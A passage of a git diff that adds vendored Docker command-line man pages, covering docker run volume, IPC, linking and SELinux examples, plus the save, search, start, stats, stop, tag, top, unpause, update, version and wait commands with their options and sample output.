`slave` enables only one +way mount propagation and that is mounts done on host under that volume +will be visible inside container but not the other way around. + +To control mount propagation property of volume one can use `:[r]shared`, +`:[r]slave` or `:[r]private` propagation flag. Propagation property can +be specified only for bind mounted volumes and not for internal volumes or +named volumes. For mount propagation to work source mount point (mount point +where source dir is mounted on) has to have right propagation properties. For +shared volumes, source mount point has to be shared. And for slave volumes, +source mount has to be either shared or slave. + +Use `df ` to figure out the source mount and then use +`findmnt -o TARGET,PROPAGATION ` to figure out propagation +properties of source mount. If `findmnt` utility is not available, then one +can look at mount entry for source mount point in `/proc/self/mountinfo`. Look +at `optional fields` and see if any propagaion properties are specified. +`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if +nothing is there that means mount is `private`. + +To change propagation properties of a mount point use `mount` command. For +example, if one wants to bind mount source directory `/foo` one can do +`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This +will convert /foo into a `shared` mount point. Alternatively one can directly +change propagation properties of source mount. Say `/` is source mount for +`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount. + +> **Note**: +> When using systemd to manage the Docker daemon's start and stop, in the systemd +> unit file there is an option to control mount propagation for the Docker daemon +> itself, called `MountFlags`. The value of this setting may cause Docker to not +> see mount propagation changes made on the mount point. For example, if this value +> is `slave`, you may not be able to use the `shared` or `rshared` propagation on +> a volume. + +To disable automatic copying of data from the container path to the volume, use +the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes. + +**--volume-driver**="" + Container's volume driver. This driver creates volumes specified either from + a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag. + See **docker-volume-create(1)** for full details. + +**--volumes-from**=[] + Mount volumes from the specified container(s) + + Mounts already mounted volumes from a source container onto another + container. You must supply the source's container-id. To share + a volume, use the **--volumes-from** option when running + the target container. You can share volumes even if the source container + is not running. + + By default, Docker mounts the volumes in the same mode (read-write or + read-only) as it is mounted in the source container. Optionally, you + can change this by suffixing the container-id with either the `:ro` or + `:rw ` keyword. + + If the location of the volume from the source container overlaps with + data residing on a target container, then the volume hides + that data on the target. + +**-w**, **--workdir**="" + Working directory inside the container + + The default working directory for +running binaries within a container is the root directory (/). The developer can +set a different default with the Dockerfile WORKDIR instruction. The operator +can override the working directory by using the **-w** option. + +# Exit Status + +The exit code from `docker run` gives information about why the container +failed to run or why it exited. When `docker run` exits with a non-zero code, +the exit codes follow the `chroot` standard, see below: + +**_125_** if the error is with Docker daemon **_itself_** + + $ docker run --foo busybox; echo $? + # flag provided but not defined: --foo + See 'docker run --help'. + 125 + +**_126_** if the **_contained command_** cannot be invoked + + $ docker run busybox /etc; echo $? + # exec: "/etc": permission denied + docker: Error response from daemon: Contained command could not be invoked + 126 + +**_127_** if the **_contained command_** cannot be found + + $ docker run busybox foo; echo $? + # exec: "foo": executable file not found in $PATH + docker: Error response from daemon: Contained command not found or does not exist + 127 + +**_Exit code_** of **_contained command_** otherwise + + $ docker run busybox /bin/sh -c 'exit 3' + # 3 + +# EXAMPLES + +## Running container in read-only mode + +During container image development, containers often need to write to the image +content. Installing packages into /usr, for example. In production, +applications seldom need to write to the image. Container applications write +to volumes if they need to write to file systems at all. Applications can be +made more secure by running them in read-only mode using the --read-only switch. +This protects the containers image from modification. Read only containers may +still need to write temporary data. The best way to handle this is to mount +tmpfs directories on /run and /tmp. + + # docker run --read-only --tmpfs /run --tmpfs /tmp -i -t fedora /bin/bash + +## Exposing log messages from the container to the host's log + +If you want messages that are logged in your container to show up in the host's +syslog/journal then you should bind mount the /dev/log directory as follows. + + # docker run -v /dev/log:/dev/log -i -t fedora /bin/bash + +From inside the container you can test this by sending a message to the log. + + (bash)# logger "Hello from my container" + +Then exit and check the journal. + + # exit + + # journalctl -b | grep Hello + +This should list the message sent to logger. + +## Attaching to one or more from STDIN, STDOUT, STDERR + +If you do not specify -a then Docker will attach everything (stdin,stdout,stderr) +. You can specify to which of the three standard streams (stdin, stdout, stderr) +you'd like to connect instead, as in: + + # docker run -a stdin -a stdout -i -t fedora /bin/bash + +## Sharing IPC between containers + +Using shm_server.c available here: https://www.cs.cf.ac.uk/Dave/C/node27.html + +Testing `--ipc=host` mode: + +Host shows a shared memory segment with 7 pids attached, happens to be from httpd: + +``` + $ sudo ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x01128e25 0 root 600 1000 7 +``` + +Now run a regular container, and it correctly does NOT see the shared memory segment from the host: + +``` + $ docker run -it shm ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status +``` + +Run a container with the new `--ipc=host` option, and it now sees the shared memory segment from the host httpd: + + ``` + $ docker run -it --ipc=host shm ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x01128e25 0 root 600 1000 7 +``` +Testing `--ipc=container:CONTAINERID` mode: + +Start a container with a program to create a shared memory segment: +``` + $ docker run -it shm bash + $ sudo shm/shm_server & + $ sudo ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x0000162e 0 root 666 27 1 +``` +Create a 2nd container correctly shows no shared memory segment from 1st container: +``` + $ docker run shm ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status +``` + +Create a 3rd container using the new --ipc=container:CONTAINERID option, now it shows the shared memory segment from the first: + +``` + $ docker run -it --ipc=container:ed735b2264ac shm ipcs -m + $ sudo ipcs -m + + ------ Shared Memory Segments -------- + key shmid owner perms bytes nattch status + 0x0000162e 0 root 666 27 1 +``` + +## Linking Containers + +> **Note**: This section describes linking between containers on the +> default (bridge) network, also known as "legacy links". Using `--link` +> on user-defined networks uses the DNS-based discovery, which does not add +> entries to `/etc/hosts`, and does not set environment variables for +> discovery. + +The link feature allows multiple containers to communicate with each other. For +example, a container whose Dockerfile has exposed port 80 can be run and named +as follows: + + # docker run --name=link-test -d -i -t fedora/httpd + +A second container, in this case called linker, can communicate with the httpd +container, named link-test, by running with the **--link=:** + + # docker run -t -i --link=link-test:lt --name=linker fedora /bin/bash + +Now the container linker is linked to container link-test with the alias lt. +Running the **env** command in the linker container shows environment variables + with the LT (alias) context (**LT_**) + + # env + HOSTNAME=668231cb0978 + TERM=xterm + LT_PORT_80_TCP=tcp://172.17.0.3:80 + LT_PORT_80_TCP_PORT=80 + LT_PORT_80_TCP_PROTO=tcp + LT_PORT=tcp://172.17.0.3:80 + PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + PWD=/ + LT_NAME=/linker/lt + SHLVL=1 + HOME=/ + LT_PORT_80_TCP_ADDR=172.17.0.3 + _=/usr/bin/env + +When linking two containers Docker will use the exposed ports of the container +to create a secure tunnel for the parent to access. + +If a container is connected to the default bridge network and `linked` +with other containers, then the container's `/etc/hosts` file is updated +with the linked container's name. + +> **Note** Since Docker may live update the container's `/etc/hosts` file, there +may be situations when processes inside the container can end up reading an +empty or incomplete `/etc/hosts` file. In most cases, retrying the read again +should fix the problem. + + +## Mapping Ports for External Usage + +The exposed port of an application can be mapped to a host port using the **-p** +flag. For example, an httpd port 80 can be mapped to the host port 8080 using the +following: + + # docker run -p 8080:80 -d -i -t fedora/httpd + +## Creating and Mounting a Data Volume Container + +Many applications require the sharing of persistent data across several +containers. Docker allows you to create a Data Volume Container that other +containers can mount from. For example, create a named container that contains +directories /var/volume1 and /tmp/volume2. The image will need to contain these +directories so a couple of RUN mkdir instructions might be required for you +fedora-data image: + + # docker run --name=data -v /var/volume1 -v /tmp/volume2 -i -t fedora-data true + # docker run --volumes-from=data --name=fedora-container1 -i -t fedora bash + +Multiple --volumes-from parameters will bring together multiple data volumes from +multiple containers. And it's possible to mount the volumes that came from the +DATA container in yet another container via the fedora-container1 intermediary +container, allowing to abstract the actual data source from users of that data: + + # docker run --volumes-from=fedora-container1 --name=fedora-container2 -i -t fedora bash + +## Mounting External Volumes + +To mount a host directory as a container volume, specify the absolute path to +the directory and the absolute path for the container directory separated by a +colon: + + # docker run -v /var/db:/data1 -i -t fedora bash + +When using SELinux, be aware that the host has no knowledge of container SELinux +policy. Therefore, in the above example, if SELinux policy is enforced, the +`/var/db` directory is not writable to the container. A "Permission Denied" +message will occur and an avc: message in the host's syslog. + + +To work around this, at time of writing this man page, the following command +needs to be run in order for the proper SELinux policy type label to be attached +to the host directory: + + # chcon -Rt svirt_sandbox_file_t /var/db + + +Now, writing to the /data1 volume in the container will be allowed and the +changes will also be reflected on the host in /var/db. + +## Using alternative security labeling + +You can override the default labeling scheme for each container by specifying +the `--security-opt` flag. For example, you can specify the MCS/MLS level, a +requirement for MLS systems. Specifying the level in the following command +allows you to share the same content between containers. + + # docker run --security-opt label=level:s0:c100,c200 -i -t fedora bash + +An MLS example might be: + + # docker run --security-opt label=level:TopSecret -i -t rhel7 bash + +To disable the security labeling for this container versus running with the +`--permissive` flag, use the following command: + + # docker run --security-opt label=disable -i -t fedora bash + +If you want a tighter security policy on the processes within a container, +you can specify an alternate type for the container. You could run a container +that is only allowed to listen on Apache ports by executing the following +command: + + # docker run --security-opt label=type:svirt_apache_t -i -t centos bash + +Note: + +You would have to write policy defining a `svirt_apache_t` type. + +## Setting device weight + +If you want to set `/dev/sda` device weight to `200`, you can specify the device +weight by `--blkio-weight-device` flag. Use the following command: + + # docker run -it --blkio-weight-device "/dev/sda:200" ubuntu + +## Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Microsoft Windows. The `--isolation ` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. These two commands are equivalent on Linux: + +``` +$ docker run -d busybox top +$ docker run -d --isolation default busybox top +``` + +On Microsoft Windows, can take any of these values: + +* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. +* `process`: Namespace isolation only. +* `hyperv`: Hyper-V hypervisor partition-based isolation. + +In practice, when running on Microsoft Windows without a `daemon` option set, these two commands are equivalent: + +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation process busybox top +``` + +If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, any of these commands also result in `hyperv` isolation: + +``` +$ docker run -d --isolation default busybox top +$ docker run -d --isolation hyperv busybox top +``` + +## Setting Namespaced Kernel Parameters (Sysctls) + +The `--sysctl` sets namespaced kernel parameters (sysctls) in the +container. For example, to turn on IP forwarding in the containers +network namespace, run this command: + + $ docker run --sysctl net.ipv4.ip_forward=1 someimage + +Note: + +Not all sysctls are namespaced. Docker does not support changing sysctls +inside of a container that also modify the host system. As the kernel +evolves we expect to see more sysctls become namespaced. + +See the definition of the `--sysctl` option above for the current list of +supported sysctls. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-save.1.md b/vendor/github.com/docker/docker/man/docker-save.1.md new file mode 100644 index 0000000000..1d1de8a1df --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-save.1.md @@ -0,0 +1,45 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-save - Save one or more images to a tar archive (streamed to STDOUT by default) + +# SYNOPSIS +**docker save** +[**--help**] +[**-o**|**--output**[=*OUTPUT*]] +IMAGE [IMAGE...] + +# DESCRIPTION +Produces a tarred repository to the standard output stream. Contains all +parent layers, and all tags + versions, or specified repo:tag. + +Stream to a file instead of STDOUT by using **-o**. + +# OPTIONS +**--help** + Print usage statement + +**-o**, **--output**="" + Write to a file, instead of STDOUT + +# EXAMPLES + +Save all fedora repository images to a fedora-all.tar and save the latest +fedora image to a fedora-latest.tar: + + $ docker save fedora > fedora-all.tar + $ docker save --output=fedora-latest.tar fedora:latest + $ ls -sh fedora-all.tar + 721M fedora-all.tar + $ ls -sh fedora-latest.tar + 367M fedora-latest.tar + +# See also +**docker-load(1)** to load an image from a tar archive on STDIN. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-search.1.md b/vendor/github.com/docker/docker/man/docker-search.1.md new file mode 100644 index 0000000000..ad8bbc78b2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-search.1.md @@ -0,0 +1,70 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-search - Search the Docker Hub for images + +# SYNOPSIS +**docker search** +[**-f**|**--filter**[=*[]*]] +[**--help**] +[**--limit**[=*LIMIT*]] +[**--no-trunc**] +TERM + +# DESCRIPTION + +Search Docker Hub for images that match the specified `TERM`. The table +of images returned displays the name, description (truncated by default), number +of stars awarded, whether the image is official, and whether it is automated. + +*Note* - Search queries will only return up to 25 results + +# OPTIONS + +**-f**, **--filter**=[] + Filter output based on these conditions: + - stars= + - is-automated=(true|false) + - is-official=(true|false) + +**--help** + Print usage statement + +**--limit**=*LIMIT* + Maximum returned search results. The default is 25. + +**--no-trunc**=*true*|*false* + Don't truncate output. The default is *false*. + +# EXAMPLES + +## Search Docker Hub for ranked images + +Search a registry for the term 'fedora' and only display those images +ranked 3 or higher: + + $ docker search --filter=stars=3 fedora + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + mattdm/fedora A basic Fedora image corresponding roughly... 50 + fedora (Semi) Official Fedora base image. 38 + mattdm/fedora-small A small Fedora image on which to build. Co... 8 + goldmann/wildfly A WildFly application server running on a ... 3 [OK] + +## Search Docker Hub for automated images + +Search Docker Hub for the term 'fedora' and only display automated images +ranked 1 or higher: + + $ docker search --filter=is-automated=true --filter=stars=1 fedora + NAME DESCRIPTION STARS OFFICIAL AUTOMATED + goldmann/wildfly A WildFly application server running on a ... 3 [OK] + tutum/fedora-20 Fedora 20 image with SSH access. For the r... 1 [OK] + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +April 2016, updated by Vincent Demeester + diff --git a/vendor/github.com/docker/docker/man/docker-start.1.md b/vendor/github.com/docker/docker/man/docker-start.1.md new file mode 100644 index 0000000000..c00b0a1668 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-start.1.md @@ -0,0 +1,39 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-start - Start one or more containers + +# SYNOPSIS +**docker start** +[**-a**|**--attach**] +[**--detach-keys**[=*[]*]] +[**--help**] +[**-i**|**--interactive**] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +Start one or more containers. + +# OPTIONS +**-a**, **--attach**=*true*|*false* + Attach container's STDOUT and STDERR and forward all signals to the + process. The default is *false*. + +**--detach-keys**="" + Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**--help** + Print usage statement + +**-i**, **--interactive**=*true*|*false* + Attach container's STDIN. The default is *false*. + +# See also +**docker-stop(1)** to stop a container. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-stats.1.md b/vendor/github.com/docker/docker/man/docker-stats.1.md new file mode 100644 index 0000000000..0f022cd412 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-stats.1.md @@ -0,0 +1,57 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-stats - Display a live stream of one or more containers' resource usage statistics + +# SYNOPSIS +**docker stats** +[**-a**|**--all**] +[**--help**] +[**--no-stream**] +[**--format[="*TEMPLATE*"]**] +[CONTAINER...] + +# DESCRIPTION + +Display a live stream of one or more containers' resource usage statistics + +# OPTIONS +**-a**, **--all**=*true*|*false* + Show all containers. Only running containers are shown by default. The default is *false*. + +**--help** + Print usage statement + +**--no-stream**=*true*|*false* + Disable streaming stats and only pull the first result, default setting is false. + +**--format**="*TEMPLATE*" + Pretty-print containers statistics using a Go template. + Valid placeholders: + .Container - Container name or ID. + .Name - Container name. + .ID - Container ID. + .CPUPerc - CPU percentage. + .MemUsage - Memory usage. + .NetIO - Network IO. + .BlockIO - Block IO. + .MemPerc - Memory percentage (Not available on Windows). + .PIDs - Number of PIDs (Not available on Windows). + +# EXAMPLES + +Running `docker stats` on all running containers + + $ docker stats + CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O + 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB + 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B + d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B + +Running `docker stats` on multiple containers by name and id. + + $ docker stats fervent_panini 5acfcb1b4fd1 + CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O + 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B + fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B diff --git a/vendor/github.com/docker/docker/man/docker-stop.1.md b/vendor/github.com/docker/docker/man/docker-stop.1.md new file mode 100644 index 0000000000..fa377c92c4 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-stop.1.md @@ -0,0 +1,30 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-stop - Stop a container by sending SIGTERM and then SIGKILL after a grace period + +# SYNOPSIS +**docker stop** +[**--help**] +[**-t**|**--time**[=*10*]] +CONTAINER [CONTAINER...] + +# DESCRIPTION +Stop a container (Send SIGTERM, and then SIGKILL after + grace period) + +# OPTIONS +**--help** + Print usage statement + +**-t**, **--time**=*10* + Number of seconds to wait for the container to stop before killing it. Default is 10 seconds. + +#See also +**docker-start(1)** to restart a stopped container. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-tag.1.md b/vendor/github.com/docker/docker/man/docker-tag.1.md new file mode 100644 index 0000000000..7f27e1b0e1 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-tag.1.md @@ -0,0 +1,76 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-tag - Create a tag `TARGET_IMAGE` that refers to `SOURCE_IMAGE` + +# SYNOPSIS +**docker tag** +[**--help**] +SOURCE_NAME[:TAG] TARGET_NAME[:TAG] + +# DESCRIPTION +Assigns a new alias to an image in a registry. An alias refers to the +entire image name including the optional `TAG` after the ':'. + +# "OPTIONS" +**--help** + Print usage statement. + +**NAME** + The image name which is made up of slash-separated name components, + optionally prefixed by a registry hostname. The hostname must comply with + standard DNS rules, but may not contain underscores. If a hostname is + present, it may optionally be followed by a port number in the format + `:8080`. If not present, the command uses Docker's public registry located at + `registry-1.docker.io` by default. Name components may contain lowercase + characters, digits and separators. A separator is defined as a period, one or + two underscores, or one or more dashes. A name component may not start or end + with a separator. + +**TAG** + The tag assigned to the image to version and distinguish images with the same + name. The tag name may contain lowercase and uppercase characters, digits, + underscores, periods and dashes. A tag name may not start with a period or a + dash and may contain a maximum of 128 characters. + +# EXAMPLES + +## Tagging an image referenced by ID + +To tag a local image with ID "0e5574283393" into the "fedora" repository with +"version1.0": + + docker tag 0e5574283393 fedora/httpd:version1.0 + +## Tagging an image referenced by Name + +To tag a local image with name "httpd" into the "fedora" repository with +"version1.0": + + docker tag httpd fedora/httpd:version1.0 + +Note that since the tag name is not specified, the alias is created for an +existing local version `httpd:latest`. + +## Tagging an image referenced by Name and Tag + +To tag a local image with name "httpd" and tag "test" into the "fedora" +repository with "version1.0.test": + + docker tag httpd:test fedora/httpd:version1.0.test + +## Tagging an image for a private repository + +To push an image to a private registry and not the central Docker +registry you must tag it with the registry hostname and port (if needed). + + docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +July 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-top.1.md b/vendor/github.com/docker/docker/man/docker-top.1.md new file mode 100644 index 0000000000..a666f7cd37 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-top.1.md @@ -0,0 +1,36 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-top - Display the running processes of a container + +# SYNOPSIS +**docker top** +[**--help**] +CONTAINER [ps OPTIONS] + +# DESCRIPTION + +Display the running process of the container. ps-OPTION can be any of the options you would pass to a Linux ps command. + +All displayed information is from host's point of view. + +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES + +Run **docker top** with the ps option of -x: + + $ docker top 8601afda2b -x + PID TTY STAT TIME COMMAND + 16623 ? Ss 0:00 sleep 99999 + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +June 2015, updated by Ma Shimiao +December 2015, updated by Pavel Pospisil diff --git a/vendor/github.com/docker/docker/man/docker-unpause.1.md b/vendor/github.com/docker/docker/man/docker-unpause.1.md new file mode 100644 index 0000000000..e6fd3c4e01 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-unpause.1.md @@ -0,0 +1,28 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-unpause - Unpause all processes within one or more containers + +# SYNOPSIS +**docker unpause** +CONTAINER [CONTAINER...] + +# DESCRIPTION + +The `docker unpause` command un-suspends all processes in the specified containers. +On Linux, it does this using the cgroups freezer. + +See the [cgroups freezer documentation] +(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for +further details. + +# OPTIONS +**--help** + Print usage statement + +# See also +**docker-pause(1)** to pause all processes within one or more containers. + +# HISTORY +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-update.1.md b/vendor/github.com/docker/docker/man/docker-update.1.md new file mode 100644 index 0000000000..85f3dd07c1 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-update.1.md @@ -0,0 +1,171 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-update - Update configuration of one or more containers + +# SYNOPSIS +**docker update** +[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] +[**--cpu-shares**[=*0*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpu-rt-period**[=*0*]] +[**--cpu-rt-runtime**[=*0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**--help**] +[**--kernel-memory**[=*KERNEL-MEMORY*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--memory-reservation**[=*MEMORY-RESERVATION*]] +[**--memory-swap**[=*MEMORY-SWAP*]] +[**--restart**[=*""*]] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +The **docker update** command dynamically updates container configuration. +You can use this command to prevent containers from consuming too many +resources from their Docker host. With a single command, you can place +limits on a single container or on many. To specify more than one container, +provide space-separated list of container names or IDs. + +With the exception of the **--kernel-memory** option, you can specify these +options on a running or a stopped container. On kernel version older than +4.6, You can only update **--kernel-memory** on a stopped container or on +a running container with kernel memory initialized. + +# OPTIONS + +**--blkio-weight**=0 + Block IO weight (relative weight) accepts a weight value between 10 and 1000. + +**--cpu-shares**=0 + CPU shares (relative weight) + +**--cpu-period**=0 + Limit the CPU CFS (Completely Fair Scheduler) period + + Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. + +**--cpu-quota**=0 + Limit the CPU CFS (Completely Fair Scheduler) quota + +**--cpu-rt-period**=0 + Limit the CPU real-time period in microseconds + + Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. + +**--cpu-rt-runtime**=0 + Limit the CPU real-time runtime in microseconds + + Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: + Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. + + The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. + +**--cpuset-cpus**="" + CPUs in which to allow execution (0-3, 0,1) + +**--cpuset-mems**="" + Memory nodes(MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + +**--help** + Print usage statement + +**--kernel-memory**="" + Kernel memory limit (format: `[]`, where unit = b, k, m or g) + + Note that on kernel version older than 4.6, you can not update kernel memory on + a running container if the container is started without kernel memory initialized, + in this case, it can only be updated after it's stopped. The new setting takes + effect when the container is started. + +**-m**, **--memory**="" + Memory limit (format: , where unit = b, k, m or g) + + Note that the memory should be smaller than the already set swap memory limit. + If you want update a memory limit bigger than the already set swap memory limit, + you should update swap memory limit at the same time. If you don't set swap memory + limit on docker create/run but only memory limit, the swap memory is double + the memory limit. + +**--memory-reservation**="" + Memory soft limit (format: [], where unit = b, k, m or g) + +**--memory-swap**="" + Total memory limit (memory + swap) + +**--restart**="" + Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). + +# EXAMPLES + +The following sections illustrate ways to use this command. + +### Update a container's cpu-shares + +To limit a container's cpu-shares to 512, first identify the container +name or ID. You can use **docker ps** to find these values. You can also +use the ID returned from the **docker run** command. Then, do the following: + +```bash +$ docker update --cpu-shares 512 abebf7571666 +``` + +### Update a container with cpu-shares and memory + +To update multiple resource configurations for multiple containers: + +```bash +$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse +``` + +### Update a container's kernel memory constraints + +You can update a container's kernel memory limit using the **--kernel-memory** +option. On kernel version older than 4.6, this option can be updated on a +running container only if the container was started with **--kernel-memory**. +If the container was started *without* **--kernel-memory** you need to stop +the container before updating kernel memory. + +For example, if you started a container with this command: + +```bash +$ docker run -dit --name test --kernel-memory 50M ubuntu bash +``` + +You can update kernel memory while the container is running: + +```bash +$ docker update --kernel-memory 80M test +``` + +If you started a container *without* kernel memory initialized: + +```bash +$ docker run -dit --name test2 --memory 300M ubuntu bash +``` + +Update kernel memory of running container `test2` will fail. You need to stop +the container before updating the **--kernel-memory** setting. The next time you +start it, the container uses the new value. + +Kernel version newer than (include) 4.6 does not have this limitation, you +can use `--kernel-memory` the same way as other options. + +### Update a container's restart policy + +You can change a container's restart policy on a running container. The new +restart policy takes effect instantly after you run `docker update` on a +container. + +To update restart policy for one or more containers: + +```bash +$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse +``` + +Note that if the container is started with "--rm" flag, you cannot update the restart +policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the +container. diff --git a/vendor/github.com/docker/docker/man/docker-version.1.md b/vendor/github.com/docker/docker/man/docker-version.1.md new file mode 100644 index 0000000000..1838f82052 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-version.1.md @@ -0,0 +1,62 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2015 +# NAME +docker-version - Show the Docker version information. + +# SYNOPSIS +**docker version** +[**--help**] +[**-f**|**--format**[=*FORMAT*]] + +# DESCRIPTION +This command displays version information for both the Docker client and +daemon. + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--format**="" + Format the output using the given Go template. + +# EXAMPLES + +## Display Docker version information + +The default output: + + $ docker version + Client: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + + Server: + Version: 1.8.0 + API version: 1.20 + Go version: go1.4.2 + Git commit: f5bae0a + Built: Tue Jun 23 17:56:00 UTC 2015 + OS/Arch: linux/amd64 + +Get server version: + + $ docker version --format '{{.Server.Version}}' + 1.8.0 + +Dump raw data: + +To view all available fields, you can use the format `{{json .}}`. + + $ docker version --format '{{json .}}' + {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} + + +# HISTORY +June 2014, updated by Sven Dowideit +June 2015, updated by John Howard +June 2015, updated by Patrick Hemmer diff --git a/vendor/github.com/docker/docker/man/docker-wait.1.md b/vendor/github.com/docker/docker/man/docker-wait.1.md new file mode 100644 index 0000000000..678800966b --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-wait.1.md @@ -0,0 +1,30 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-wait - Block until one or more containers stop, then print their exit codes + +# SYNOPSIS +**docker wait** +[**--help**] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +Block until one or more containers stop, then print their exit codes. + +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES + + $ docker run -d fedora sleep 99 + 079b83f558a2bc52ecad6b2a5de13622d584e6bb1aea058c11b36511e85e7622 + $ docker wait 079b83f558a2bc + 0 + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven 